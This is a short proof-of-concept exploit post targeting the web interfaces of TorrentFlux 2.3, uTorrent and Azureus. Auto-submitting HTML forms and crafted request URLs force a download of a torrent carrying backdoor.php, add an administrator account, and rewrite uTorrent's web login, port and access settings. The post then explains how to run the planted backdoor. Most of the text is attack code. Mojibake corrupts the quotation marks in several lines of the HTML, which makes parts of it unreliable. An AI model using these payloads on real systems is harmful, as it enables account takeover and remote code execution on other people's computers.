The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.
More information:
http://www.rooksecurity.com/blog/?p=10
TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/
If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.
<html>
<form id='file_attack' method="post" action="" rel="nofollow">http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name="url_upload" value="" rel="nofollow">http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</from>
<html>
<script>
document.getElementById('file_attack').submit();
</script>
<html>
Add an admistrative account:
<form id=喝reate_admin鈠method=屶ost鐠action=垈ttp://localhost/torrentflux_2.3/html/admin.php?op=addUser鐾
<input type=hidden name=墹ewUser鐠value=岾admin鐾
<input type=hidden name=屶ass1″ value=屶assword鐾
<input type=hidden name=屶ass2″ value=屶assword鐾
<input type=hidden name=弖serType鐠value=1>
<input type=submit value=喝reate admin鈾
</form>
</html>
<script>
document.getElementById(喝reate_admin鈩.submit();
</script>
uTorrent旧 WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azurues旧 HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent